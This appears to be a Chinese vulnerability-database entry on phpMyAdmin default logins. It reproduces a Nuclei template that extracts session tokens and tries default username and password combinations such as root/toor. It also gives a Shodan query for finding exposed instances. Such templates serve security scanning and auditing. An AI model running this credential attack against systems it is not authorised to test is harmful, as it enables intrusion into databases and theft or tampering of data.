漏洞信息
漏洞名称: phpMyAdmin 默认登录漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: phpMyAdmin是一个广泛使用的开源数据库管理工具,主要用于通过Web界面管理MySQL数据库。它被广泛部署在各种环境中,包括个人网站、企业级服务等,因其易用性和功能强大而受到欢迎。该工具默认安装后可能存在默认登录凭证的问题,攻击者可以利用这些默认凭证未经授权访问数据库管理系统。该漏洞属于弱口令类型,其技术根源在于系统或应用默认配置中使用了容易被猜测或已知的默认用户名和密码组合。攻击者通过尝试这些默认凭证,可以成功登录系统,进而访问敏感信息、修改数据或执行未授权操作。这种漏洞的危害性较高,因为它不需要复杂的攻击技术,且一旦成功利用,攻击者可以完全控制受影响的数据库系统,导致数据泄露、数据篡改甚至服务中断等严重后果。由于phpMyAdmin的广泛使用,该漏洞的影响范围较大,特别是在那些未更改默认配置或未及时更新补丁的环境中。
产品厂商: phpmyadmin
产品名称: phpMyAdmin
影响版本: *
搜索语法: http.title:phpMyAdmin
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fphpmyadmin%2Fphpmyadmin-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
|
id: phpmyadmin-default-login
info:
name: phpMyAdmin - Default Login
author: Natto97,notwhy
severity: high
description: phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.phpmyadmin.net
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 17
shodan-query: http.title:phpMyAdmin
product: phpmyadmin
vendor: phpmyadmin
tags: default-login,phpmyadmin
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "phpMyAdmin"
- "phpmyadmin"
condition: or
internal: true
- raw:
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: phpMyAdmin={{token2}}; pma_lang=en
set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}
attack: clusterbomb
payloads:
user:
- root
- mysql
password:
- 123456
- root
- mysql
- toor
extractors:
- type: regex
name: token
internal: true
group: 1
regex:
- 'name="token" value="([0-9a-z]+)"'
- type: regex
name: token2
internal: true
group: 1
regex:
- 'name="set_session" value="([0-9a-z]+)"'
- type: regex
name: session
part: header
internal: true
group: 2
regex:
- "phpMyAdmin(_https)?=([0-9a-z]+)"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(header_2, "phpMyAdmin=") && contains(header_2, "pmaUser-1=")
- status_code_2 == 302
- contains(header_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(header_2, '/index.php?route=/&route=%2F')
condition: and
|